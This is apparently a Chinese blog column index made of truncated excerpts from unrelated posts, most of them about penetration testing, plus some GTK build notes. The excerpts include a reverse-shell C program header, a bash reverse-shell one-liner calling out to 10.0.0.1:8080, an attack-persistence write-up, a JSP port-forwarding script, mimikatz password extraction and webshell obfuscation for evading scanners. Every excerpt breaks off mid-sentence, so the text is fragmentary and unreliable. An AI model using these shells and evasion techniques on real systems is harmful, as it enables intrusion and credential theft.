test_20140325的专栏

// Wr1tt3n by phr0z#include #include #include #include #include #include #include #include #include #define PORT 12345 // the port client will be connecting to#define SHELL "/bin/sh" //

#include　　int dup（int fd）；　　int dup2（int fd1，int fd2）；　　两个均为复制一个现存的文件的描述　　两个函数的返回：若成功为新的文件描述，若出错为-1；　　由dup返回的新文件描述符一定是当前可用文件描述中的最小数值。用dup2则可以用fd2参数指定新的描述符数值。如果fd2已经打开，则先关闭。若fd1=fd2，则dup2

大家在做渗透测试的时候，遇到linux的服务器，想反弹shell回来本地溢出提权，怎么办？上传反弹脚本？当然可以，今天再告诉大家几种方法，国外大牛和国内大牛整理的，希望大家喜欢。bash版本：1bash -i >& /dev/tcp/10.0.0.1/8080 0>&1注意这个是由解析shell的bash完成，所以

转载FreeBuf.COM这篇文章写来主要是一次娱乐性的练习。共享出攻击的细节，其中包括一些经过原作者修改过的各种来源的脚本文件。渗透的过程不是重点，之所以发出来最大的原因主要是文章后半部分维持持久化攻击的一些地方还是很值得学习的，顺便大家也可以再次熟悉一下MSF框架。希望对大家有所帮助。攻击环境：Ubuntu12.04LTS 32bit（靶机，默认的软件安装配置）V

渗透过程中，由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造LCX的功能，具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说，可以比较方便的实现端口转发。在这里发布出来，小伙伴们使用过程中，如果发现什么bug欢迎提交哈~参数说明/KPortTran.jsp?lip

昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下神器下载地址:http://blog.gentilkiwi.com/mimikatz还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章http://pentestmonkey.net/blog/mimikatz-tool-to-recover-clea

GTK依赖于特定的库：GLib 库ATK 库Cairo 库Pango 库依赖库的安装顺序：根据依赖关系的要求，库的安装要按照这样的先后顺序进行：GLib、Atk、Cairo、Pango、Gtk+.解压bz2和xz包命令及源码编译GTK+库：tar xvfj gtk+-3.2.0.tar.bz2tar x

http://ftp.gnome.org/pub/gnome/sources/http://download.chinaunix.net/download/

我用的发行版是 Ubuntu7.04，最简单的办法就是用“新立得软件包管理器”，安装“libgtk2.0-dev”这个包即可。但我打算从源码安装。需要下载的包：ftp://mirrors.kernel.org/gnu/gettext/gettext-0.17.tar.gzftp://ftp.gtk.org/pub/glib/2.15/glib-2.15.1.tar.bz2ftp

[笔记]PHP一句话Webshell变形总结darkray @ WEB安全 2012-10-12 共 10565 人围观，发现 4 个不明物体收藏该文0×00 前言大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还

https://github.com     (c)http://www.freebuf.com/